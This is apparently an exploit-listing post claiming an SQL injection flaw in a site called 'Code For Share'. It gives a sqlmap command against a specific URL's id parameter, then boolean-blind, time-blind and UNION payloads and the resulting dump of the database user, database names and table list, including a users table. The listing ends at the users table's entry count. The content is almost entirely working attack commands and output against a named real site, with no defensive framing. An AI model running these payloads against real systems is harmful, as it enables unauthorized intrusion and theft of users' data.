# Exploit Title: Code For Share | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://c4s.khacdatdo.dev/edit.php?id=33" --dbs --batch
---------------------------------------------------------------------------------------------------
.dev Developer / Software
Code For Share
https://c4s.khacdatdo.dev/edit.php?id=33
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=136 AND 3415=3415
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=136 AND (SELECT 2301 FROM (SELECT(SLEEP(5)))MWrG)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=136 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178766271,0x514a7842596c6b48737771584e474d756864455053446a54765843454d6b6b6441654351776e6965,0x717a6b6a71),NULL,NULL-- -
---
database management system users [1]:
[+] 'i4b3whw47kx5zgbc'@'%'
the back-end DBMS is MySQL
web application technology: PHP, Apache
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[+] an1g279qniutsqwr
[+] information_schema
Database: an1g279qniutsqwr
[8 tables]
+---------------+
| discord-bot |
| chatbot |
| thcs2_code |
| thcs2_log |
| thcs2_report |
| thcs2_txtcode |
| thcs2_users |
| thcs2_view |
+---------------+
Database: an1g279qniutsqwr
Table: thcs2_users
[8 entries]